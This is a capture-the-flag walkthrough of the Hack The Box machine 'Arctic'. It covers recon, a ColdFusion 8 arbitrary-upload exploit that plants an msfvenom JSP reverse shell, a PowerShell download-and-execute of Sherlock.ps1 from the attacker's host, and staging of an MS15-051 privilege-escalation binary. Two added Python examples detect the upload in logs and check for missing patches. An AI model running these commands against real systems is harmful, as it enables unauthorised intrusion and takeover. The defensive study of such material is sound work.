
Getting Admin on Arctic - 'Arctic' HTB Writeup
Host Information
Hostname | IP Address | Operating System | Difficulty Level
--- | --- | --- | ---
Arctic | 10.10.10.11 | Windows | Easy
Initial Recon
Again, we start with our initial recon of the target system. We’ll use the same enumeration automation script we used on a few other recent boxes - nmapAutomator. You can find and download the script here on Github.
Let’s run a full scan against the target:
root@kali:/writeups/HTB/arctic/enumeration# nmapAutomator.sh 10.10.10.11 all
Running a all scan on 10.10.10.11
Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 18:02 CST
Nmap scan report for 10.10.10.11
Host is up (0.041s latency).
Not shown: 997 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
135/tcp open msrpc
8500/tcp open fmtp
49154/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 5.39 seconds
---------------------Starting Nmap Basic Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 18:02 CST
Nmap scan report for 10.10.10.11
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.25 seconds
----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 18:04 CST
Nmap scan report for 10.10.10.11
Host is up.
All 1000 scanned ports on 10.10.10.11 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.38 seconds
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 18:08 CST
Initiating Parallel DNS resolution of 1 host. at 18:08
Completed Parallel DNS resolution of 1 host. at 18:08, 0.01s elapsed
Initiating SYN Stealth Scan at 18:08
Scanning 10.10.10.11 [65535 ports]
Discovered open port 135/tcp on 10.10.10.11
SYN Stealth Scan Timing: About 11.75% done; ETC: 18:12 (0:03:53 remaining)
SYN Stealth Scan Timing: About 23.18% done; ETC: 18:12 (0:03:22 remaining)
SYN Stealth Scan Timing: About 34.61% done; ETC: 18:12 (0:02:52 remaining)
Discovered open port 8500/tcp on 10.10.10.11
SYN Stealth Scan Timing: About 46.04% done; ETC: 18:12 (0:02:22 remaining)
Discovered open port 49154/tcp on 10.10.10.11
SYN Stealth Scan Timing: About 57.46% done; ETC: 18:12 (0:01:52 remaining)
SYN Stealth Scan Timing: About 68.89% done; ETC: 18:12 (0:01:22 remaining)
SYN Stealth Scan Timing: About 80.32% done; ETC: 18:12 (0:00:52 remaining)
Completed SYN Stealth Scan at 18:12, 262.68s elapsed (65535 total ports)
Nmap scan report for 10.10.10.11
Host is up (0.040s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
8500/tcp open fmtp
49154/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.76 seconds
Raw packets sent: 131268 (5.776MB) | Rcvd: 204 (8.976KB)
No new ports
---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 18:12 CST
/usr/local/bin/nmapAutomator.sh: line 226: 1892 Segmentation fault $nmapType -sV --script vulners --script-args mincvss=7.0 -p$(echo "${ports}") -oN nmap/CVEs_"$1".nmap "$1"
Running Vuln scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 18:12 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.11
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8500/tcp open fmtp?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.66 seconds
---------------------Recon Recommendations----------------------
---------------------Finished all Nmap scans---------------------
Completed in 12 minute(s) and 48 second(s)
OK, so it looks like we have a Windows host with 3 open ports: 2 RPC ports, and 8500, which nmap tentatively labels as ‘fmtp.’
Let’s see if another quick nmap scan reveals anything further:
root@kali:/writeups/HTB/arctic/enumeration# nmap -sC -sV -O --osscan-guess -p 135,8500,49154 -oA further_nmap_arctic 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 18:36 CST
Nmap scan report for 10.10.10.11
Host is up (0.041s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.80 seconds
Not really; we know that the OS is Windows 7 or Server 2012 or later. OK, let’s move along.
taking a look at FMTP
I’m not familiar with this fmtp service, so let’s do a quick web search. It seems that this port is registered as “Flight Message Transfer Protocol,” but is also used by Macromedia/Adobe ColdFusion (source here, and another one here: https://www.quora.com/What-is-FMTP). Given the context of the box we’re looking at, I’m going to guess it probably has something to do with ColdFusion, rather than transferring flight-data-processing info over P2P comms based on the TCP/IP stack.
So this port in particular seems to stick out; let’s see if there’s anything on searchsploit for “fmtp” or “coldfusion”:
root@kali:/writeups/HTB/arctic/enumeration# searchsploit fmtp
--------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------- ----------------------------------------
Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service | exploits/linux/dos/44183.py
--------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
OK, so a DoS is not what we want.
Doing a searchsploit search for “ColdFusion” seems to turn up a decent number of results. Let’s see if we can somehow confirm whether ColdFusion is running, and enumerate which version of it is on the system.
Going to the URI http://10.10.10.11:8500/ in the browser seems to yield a hint that it might indeed be ColdFusion. And, ah, that would explain why the box is named Arctic. :)
Index of /
CFIDE/ dir 03/22/17 08:52 μμ
cfdocs/ dir 03/22/17 08:55 μμ
Let’s see if any of these subdirectories or files have a clue as to the version that might be running.
From going to cfdocs > dochome at http://10.10.10.11:8500/cfdocs/ we see that apparently ColdFusion 8 is installed.
OK, so let’s refine our searchsploit query to “ColdFusion 8”
root@kali:/writeups/HTB/arctic/enumeration# searchsploit coldfusion 8
--------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------- ----------------------------------------
Adobe ColdFusion - Directory Traversal (Metasploit) | exploits/multiple/remote/16985.rb
Adobe ColdFusion 2018 - Arbitrary File Upload | exploits/multiple/webapps/45979.txt
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query Str | exploits/cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizard | exploits/cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' | exploits/cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.c | exploits/cfm/webapps/33168.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserializatio | exploits/windows/remote/43993.py
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | exploits/cfm/webapps/16788.rb
ColdFusion MX - Missing Template Cross-Site Scripting | exploits/cfm/remote/21548.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Discl | exploits/multiple/remote/22867.pl
--------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
exploiting ColdFusion
The following entry looks promising:
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)
If we can upload and execute arbitrary files, it’s almost certain we could upload and execute a reverse shell payload. Unfortunately, that seems to be a Metasploit module, which we’re trying to avoid using. Let’s see if we can find a ‘manual’ equivalent on the web, and if not, we’ll look at some other exploits.
Going to the ExploitDB link for this exploit gives us the CVE number: 2009-2265.
And one of the first links on Google seems to be a standalone PoC for this exploit (from the HTB forums, no less!).
Let’s copy it to our exploits folder and give it a run.
Looks like the usage example is simple enough:
# Usage: ./exploit.py <target ip> <target port> [/path/to/coldfusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
OK, so let’s see if we can find a JSP reverse shell. A quick search shows that there’s already one in kali:
root@kali:/writeups/HTB/arctic/exploits# ll /usr/share/webshells/jsp/jsp-reverse.jsp
-rw-r--r-- 1 root root 2451 Jul 17 2019 /usr/share/webshells/jsp/jsp-reverse.jsp
Let’s go ahead and copy it to our local folder, and take a look.
root@kali:/writeups/HTB/arctic/exploits# cp /usr/share/webshells/jsp/jsp-reverse.jsp shell.jsp
Looking through the code, at first glance it looks like the webshell will give us the option to define our IP address and port on the webpage, then hit a connect button. Let’s go ahead and try it to see if it works:
root@kali:/writeups/HTB/arctic/exploits# python ./CF_afu.py 10.10.10.11 8500 /writeups/HTB/arctic/exploits/shell.jsp
Sending payload...
Successfully uploaded payload!
Find it at http://10.10.10.11:8500/userfiles/file/exploit.jsp
Let’s go ahead and start a listener on port 43110, in case the shell works:
root@kali:~# nc -lvnp 43110
listening on [any] 43110 ...
Now let’s browse to the URL.
Looks like we get an error:
500
(6,2) Unable to scan the character ' ' which follows '%'
jrun.jsp.parser.TokenMgrError: (6,2) Unable to scan the character ' ' which follows '%'
at jrun.jsp.parser.JSPParserTokenManager.getNextToken(JSPParserTokenManager.java:2086)
at jrun.jsp.parser.JSPParser.jj_ntk(JSPParser.java:1030)
at jrun.jsp.parser.JSPParser.directive(JSPParser.java:105)
at jrun.jsp.parser.JSPParser.jsp(JSPParser.java:40)
at jrun.jsp.parser.JSPParserBase.parse(JSPParserBase.java:38)
at jrun.jsp.compiler.JSPCompiler.compile(JSPCompiler.java:94)
at jrun.jsp.Translator.parsePage(Translator.java:143)
at jrun.jsp.Translator.translate(Translator.java:252)
at jrun.jsp.Translator.translate(Translator.java:101)
at jrun.jsp.JSPEngine.translateJSP(JSPEngine.java:707)
at jrun.jsp.JSPServlet.translate(JSPServlet.java:125)
at jrun.jsp.JSPServlet.service(JSPServlet.java:113)
at jrun.servlet.ServletInvoker.invoke(ServletInvoker.java:106)
at jrun.servlet.JRunInvokerChain.invokeNext(JRunInvokerChain.java:42)
at jrun.servlet.JRunRequestDispatcher.invokeNext(JRunRequestDispatcher.java:586)
at jrun.servlet.JRunRequestDispatcher.forwardInvoke(JRunRequestDispatcher.java:555)
at jrun.servlet.JRunNamedDispatcher.forward(JRunNamedDispatcher.java:64)
at coldfusion.license.JspLicenseServlet.service(Unknown Source)
at coldfusion.bootstrap.BootstrapServlet.service(BootstrapServlet.java:89)
at jrun.servlet.ServletInvoker.invoke(ServletInvoker.java:106)
at jrun.servlet.JRunInvokerChain.invokeNext(JRunInvokerChain.java:42)
at jrun.servlet.JRunRequestDispatcher.invoke(JRunRequestDispatcher.java:286)
at jrun.servlet.ServletEngineService.dispatch(ServletEngineService.java:543)
at jrun.servlet.http.WebService.invokeRunnable(WebService.java:172)
at jrunx.scheduler.ThreadPool$DownstreamMetrics.invokeRunnable(ThreadPool.java:320)
at jrunx.scheduler.ThreadPool$ThreadThrottle.invokeRunnable(ThreadPool.java:428)
at jrunx.scheduler.ThreadPool$UpstreamMetrics.invokeRunnable(ThreadPool.java:266)
at jrunx.scheduler.WorkerThread.run(WorkerThread.java:66)
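Seen from the ColdFusion server’s side, the upload above leaves a distinctive trail in the web access log: a POST to the editor’s upload connector, then requests for a .jsp under /userfiles/file/, first answered with the JSP parser’s 500 shown above and later with a 200 once a payload that compiles is dropped. The following Python is an added example written for this writeup, not code from the post or from the PoC it uses; the connector path it matches on is an assumption taken from public descriptions of CVE-2009-2265, and the log lines are constructed.

```python
import re
from collections import defaultdict

# Constructed access-log lines (Combined Log Format) modelling the request sequence
# from the writeup: a POST to the ColdFusion 8 FCKeditor upload connector (this
# connector path is an assumption taken from public CVE-2009-2265 descriptions, not
# from the writeup), the uploaded JSP landing under /userfiles/file/, the first fetch
# failing with the JSP compiler's HTTP 500, and a later fetch that runs. The last line
# is an ordinary document download and must not be flagged.
SAMPLE_LOG = """\
10.10.14.50 - - [02/Feb/2020:23:10:01 +0200] "GET /cfdocs/ HTTP/1.1" 200 1211 "-" "Mozilla/5.0"
10.10.14.50 - - [02/Feb/2020:23:12:44 +0200] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File HTTP/1.1" 200 85 "-" "python-requests/2.22"
10.10.14.50 - - [02/Feb/2020:23:12:51 +0200] "GET /userfiles/file/exploit.jsp HTTP/1.1" 500 4021 "-" "Mozilla/5.0"
10.10.14.50 - - [02/Feb/2020:23:18:03 +0200] "GET /userfiles/file/exploit.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.10.20 - - [02/Feb/2020:23:20:10 +0200] "GET /userfiles/file/report.pdf HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Extensions the ColdFusion/JRun engine will compile and run if they are requested.
EXEC_EXT = (".jsp", ".jspx", ".cfm", ".cfml")
UPLOAD_DIR = "/userfiles/file/"                  # where the writeup's upload landed
CONNECTOR_MARKERS = ("fckeditor", "upload.cfm")  # assumption, see comment above


def parse_line(line):
    """Parse one Combined-Log-Format line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["path_lower"] = entry["path"].split("?", 1)[0].lower()  # drop query string
    return entry


def classify(entry):
    """Return a finding tag for a suspicious entry, or None for ordinary traffic."""
    path = entry["path_lower"]
    if entry["method"] == "POST" and all(marker in path for marker in CONNECTOR_MARKERS):
        return "fckeditor-connector-upload"
    if path.startswith(UPLOAD_DIR) and path.endswith(EXEC_EXT):
        # A server-side script in the upload directory is wrong whatever the status:
        # 200 means it executed, anything else (the 500 from the JSP parser in the
        # writeup, for instance) means someone is trying.
        return ("script-executed-from-upload-dir" if entry["status"] == 200
                else "script-in-upload-dir-errored")
    return None


def scan(log_text):
    """Return (source_ip, tag, path, status) for every flagged line, in log order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tag = classify(entry)
        if tag:
            findings.append((entry["ip"], tag, entry["path"], entry["status"]))
    return findings


def correlate(findings):
    """Source IPs that both hit the upload connector and then touched a script in the
    upload directory: the full upload-then-execute chain, which is worth paging on."""
    tags_by_ip = defaultdict(set)
    for ip, tag, _, _ in findings:
        tags_by_ip[ip].add(tag)
    return sorted(ip for ip, tags in tags_by_ip.items()
                  if "fckeditor-connector-upload" in tags
                  and any(t.startswith("script-") for t in tags))


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("upload-then-execute chains from:", correlate(hits))
```

Run against the constructed log this flags the connector POST and both fetches of exploit.jsp (one errored, one executed) and names 10.10.14.50 as the one source that completed the chain, while the PDF download from the upload directory stays quiet. Pointing `scan()` at a real ColdFusion access log is a one-line change; the rule that matters most on a production server is the second one, since nothing under /userfiles/file/ should ever carry a server-side extension.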
gaining a foothold
Let’s try a different JSP shell; we can generate one using msfvenom:
root@kali:/writeups/HTB/arctic/exploits# msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.14.50" LPORT=43110 -f raw > shell.jsp
Payload size: 1498 bytes
root@kali:/writeups/HTB/arctic/exploits# python ./CF_afu.py 10.10.10.11 8500 /writeups/HTB/arctic/exploits/shell.jsp
Sending payload...
Successfully uploaded payload!
Find it at http://10.10.10.11:8500/userfiles/file/exploit.jsp
Going to the URL in the browser, as expected, has the page just loading. And if we check our netcat listener, we see we have a shell:
root@kali:~# nc -lvnp 43110
listening on [any] 43110 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.11] 49180
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>
We see we’re a user called tolis, so let’s see if we can grab the user flag:
C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis
C:\ColdFusion8\runtime\bin>cd c:\users\tolis
cd c:\users\tolis
c:\Users\tolis>dir
dir
Volume in drive C has no label.
Volume Serial Number is F88F-4EA5
Directory of c:\Users\tolis
22/03/2017 09:00 �� <DIR> .
22/03/2017 09:00 �� <DIR> ..
22/03/2017 09:00 �� <DIR> Contacts
22/03/2017 09:00 �� <DIR> Desktop
22/03/2017 09:00 �� <DIR> Documents
22/03/2017 09:00 �� <DIR> Downloads
22/03/2017 09:00 �� <DIR> Favorites
22/03/2017 09:00 �� <DIR> Links
22/03/2017 09:00 �� <DIR> Music
22/03/2017 09:00 �� <DIR> Pictures
22/03/2017 09:00 �� <DIR> Saved Games
22/03/2017 09:00 �� <DIR> Searches
22/03/2017 09:00 �� <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 33.184.948.224 bytes free
c:\Users\tolis>cd Desktop
cd Desktop
c:\Users\tolis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is F88F-4EA5
Directory of c:\Users\tolis\Desktop
22/03/2017 09:00 �� <DIR> .
22/03/2017 09:00 �� <DIR> ..
22/03/2017 09:01 �� 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 33.184.944.128 bytes free
c:\Users\tolis\Desktop>type user.txt
type user.txt
{myflag;getyourown:)}
c:\Users\tolis\Desktop>
Privilege Escalation
further enumeration for PrivEsc
Now we need to see how we can privesc. First let’s get a bit more information on the system with the systeminfo command:
c:\Users\tolis\Desktop>systeminfo
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ��
System Boot Time: 4/2/2020, 1:06:47 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 94 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 963 MB
Virtual Memory: In Use: 1.084 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11
Great, so it’s a 2008 R2 box, with no service packs or hotfixes detected.
The system likely has PowerShell on it, being a 2008 box, so let’s use a script we’ve used before to do some enumeration and vulnerability scanning, called Sherlock.ps1.
Let’s save that in our enumeration folder and serve the content over SimpleHTTP, making sure the Find-AllVulns function is invoked at the bottom:
root@kali:~/Dropbox/Documents/writeups/HTB/arctic/enumeration# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
And from the Arctic user shell:
powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/Sherlock.ps1')"
We get the following results:
C:\ColdFusion8\runtime\bin>powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/Sherlock.ps1')"
powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/Sherlock.ps1')"
Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Not Vulnerable
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Not Vulnerable
Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
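Sherlock’s “Appears Vulnerable” verdicts are inferred from file versions, and the systeminfo output earlier shows the other half of the picture (Hotfix(s): N/A). A defender triaging the same host would cross-check one against the other: which of the flagged bulletins actually has its closing KB installed. The Python below is an added example, not part of the writeup or of Sherlock: it parses both outputs in the layout shown above and reports, per bulletin, whether the KB is present. The bulletin-to-KB mapping is supplied here from Microsoft’s bulletin pages, and the “patched” systeminfo sample is constructed.

```python
import re

# Constructed excerpts in the same layout as the `systeminfo` and Sherlock output in
# the writeup (shortened). The "patched" variant is what the same host would report
# after some updates were installed; its KB list is constructed.
SYSTEMINFO_UNPATCHED = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

SYSTEMINFO_PATCHED = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB976902
                           [02]: KB3045171
"""

SHERLOCK_OUTPUT = """\
Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Not Vulnerable
"""

# Bulletin -> KB that closes it on Windows 7 / Server 2008 R2, taken from Microsoft's
# bulletin pages rather than from the writeup. Later cumulative updates supersede
# these exact KBs, so treat "missing" as a lead to verify, not a verdict.
BULLETIN_KB = {
    "MS10-092": "KB2305420",
    "MS15-051": "KB3045171",
}


def installed_hotfixes(systeminfo_text):
    """Return the set of KB ids listed under Hotfix(s) in `systeminfo` output."""
    kbs, in_block = set(), False
    for line in systeminfo_text.splitlines():
        if line.startswith("Hotfix(s):"):
            in_block = True          # "N/A" or "<n> Hotfix(s) Installed." follows
            continue
        if in_block:
            m = re.match(r"\s+\[\d+\]:\s*(KB\d+)", line)
            if not m:
                break                # first non-indexed line ends the block
            kbs.add(m.group(1))
    return kbs


def parse_sherlock(text):
    """Split Sherlock's key : value listing into one dict per finding."""
    records, current = [], {}
    for line in text.splitlines():
        m = re.match(r"^(\w+)\s*:\s*(.*)$", line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "Title" and current:   # a new Title starts the next record
            records.append(current)
            current = {}
        current[key] = value
    if current:
        records.append(current)
    return records


def triage(systeminfo_text, sherlock_text):
    """For each 'Appears Vulnerable' bulletin, report (bulletin, kb, state) where
    state is 'patched', 'missing' or 'unknown-kb' (bulletin not in BULLETIN_KB)."""
    have = installed_hotfixes(systeminfo_text)
    report = []
    for rec in parse_sherlock(sherlock_text):
        if rec.get("VulnStatus") != "Appears Vulnerable":
            continue
        kb = BULLETIN_KB.get(rec.get("MSBulletin", ""))
        state = "unknown-kb" if kb is None else ("patched" if kb in have else "missing")
        report.append((rec["MSBulletin"], kb, state))
    return report


if __name__ == "__main__":
    for label, info in (("as found", SYSTEMINFO_UNPATCHED), ("patched", SYSTEMINFO_PATCHED)):
        print(label, triage(info, SHERLOCK_OUTPUT))
```

On the host as found, both flagged bulletins come back “missing”, which is exactly the MS15-051 lead the writeup follows next; on the constructed patched sample MS15-051 flips to “patched” while MS10-092 stays open. The parser tolerates Sherlock’s real layout (no blank lines between records) because a new `Title` key is what starts a record.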
gaining admin on arctic
Let’s give the following entry a shot:
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Looking up the CVE number gives us this github PoC source from hfiref0x pretty quickly.
Let’s download the compiled x64 version to our exploits folder, and host the file with simpleHTTP:
root@kali:/writeups/HTB/arctic/exploits# wget https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe
--2020-02-02 23:32:52-- https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe
Resolving github.com (github.com)... 192.30.253.113
Connecting to github.com (github.com)|192.30.253.113|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/rootphantomer/exp/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe [following]
--2020-02-02 23:32:53-- https://raw.githubusercontent.com/rootphantomer/exp/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.32.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.32.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 55296 (54K) [application/octet-stream]
Saving to: ‘ms15-051.exe’
ms15-051.exe 100%[=========================================>] 54.00K --.-KB/s in 0.04s
2020-02-02 23:32:53 (1.34 MB/s) - ‘ms15-051.exe’ saved [55296/55296]
root@kali:~/Dropbox/Documents/writeups/HTB/arctic/exploits# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
